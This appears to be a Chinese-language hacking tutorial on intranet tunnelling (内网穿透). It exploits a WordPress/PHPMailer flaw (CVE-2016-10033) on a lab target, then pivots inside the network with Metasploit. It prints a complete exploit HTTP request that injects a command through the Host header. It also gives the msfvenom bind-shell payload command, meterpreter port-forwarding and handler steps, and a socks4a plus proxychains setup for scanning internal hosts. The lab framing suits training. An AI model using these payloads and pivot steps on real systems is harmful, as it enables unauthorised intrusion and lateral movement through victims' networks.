WordPress|黑客必学知识点--”什么是内网穿透“详解在平时护网比赛中

文章插图
在平时护网比赛中，攻坚环境中，渗透测试中，做内网穿透使用的工具有很多如：EW、Cobalt Strike 为了方便小白入门，本次教程通过渗透过程中最常用的MSF攻击框架中socks4做内网穿透代理，实现内网横向渗透。
用本公司的靶场，模拟一个攻坚小场景：
外网IP：112.115.*.* （一台存在wordpress漏洞的web服务器）
内网：10.0.0.0/24 （模拟开发人员，一台为weblogic漏洞机器，一台为thinkphp漏洞机器）
渗透思路：用MSF对wordpress漏洞进行反弹shell ，发现机器位于一个内网，建立socks4线路，横向扫描并对内网其他机器进行渗透并反弹shell
由于socks4做穿透超过3层就会失去流量速度，所以后期我会写一篇用EW或其他穿透工具做多网段多层穿透。
攻击机：kali
目标机：攻坚靶场
首先开启kali ，利用Wordpress 4.6 任意命令执行漏洞，对主站服务器进行上传一句话或，直接反弹shell（为了一些教会小白一些提权细节，所以先写入一句话，然后在反弹msf shell）如果自己练习，可以直接msf生成shellcode扔到主站反弹shell 。
0x001 主站渗透
打开主站.*.*:8000/介绍一下这个漏洞
文章插图
WordPress <= 4.6命令执行漏洞（PHPMailer）（CVE-2016-10033）WordPress是一种使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress用作一个内容管理系统（CMS）来使用。 WordPress使用PHPMailer组件向用户发送邮件。 PHPMailer（版本<5.2.18）存在远程命令执行漏洞，攻击者只需轻松地构造出一个恶意邮箱地址，即可写入任意文件，从而造成远程命令执行的危害。 POC
假如目标地址为：http : //127.0.0.1 : 8000/

把下面的HTTP报文复制到BurpSuite Repeater中，单击Go按钮，填充目标IP和扩展（例如， IP填充127.0.0.1填充80）

【WordPress|黑客必学知识点--”什么是内网穿透“详解】POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0Accept: */*Content-Length: 56Content-Type: application/x-www-form-urlencodedwp-submit=Get+New+Password?%3E蚁剑连接shell：127.0.0.1:5000/shell.php

文章插图
现在要对这台内网机器提权msfshell ，由于是内网隔离环境，所以需要使用bind_shell
在msf生成一个bind_shell开端口木马启动后，在做本段端口转发过去， msf在bind连接
新起一个终端：msf生成一个bindshell的木马（正向连接）
msfvenom -p linux/x86/meterpreter/bind_tcp lport=9999 -f elf -o bindshell放到通过webshell 放到/var/tmp/下加权限，启动

文章插图
现在内网10.0.0.3在9999端口开启直接连shell权限，现在要做一个新的转发把10.0.0.3:9999端口转发到本地，然后msf直连

文章插图
sessions sessions id编号meterpreter > portfwd add -L 127.0.0.1 -l 9999 -p 10.0.0.3 -r 9999

文章插图
现在内网10.0.0.3的bindshell 9999 端口转发到本地127.0.0.1:9999端口了
msf进行直连shell
use exploit/multi/handlerset payload linux/x86/meterpreter/bind_tcpshow optionsset LPORT 9999set RHOST 127.0.0.1run

文章插图
等待连接shell

文章插图
反弹shell后，只需要在10.0.0.3的shell上
use auxiliary/server/socks4aset 127.0.0.1set srvport 1081run添加一个新隧道在/etc/proxychains.conf 中添加 socks4 127.0.0.1 1081
在proxychains nmap 扫描就是直接连接到10.0.0.3上进行转发扫描，内网二级穿透扫描
127.0.0.1:1080<>主站跳板跳板机<>10.0.0.3跳板机<>新ip（192.168.0.1）实现了双跳板机内网穿透，同样方法，要是拿到192.168.0.1的第三层内网，只需要之前的添加个端口转发到本地，就能继续渗透。一般内网到第二层流量很少了，继续深层网段渗透就需要上 EW穿透神器等工具。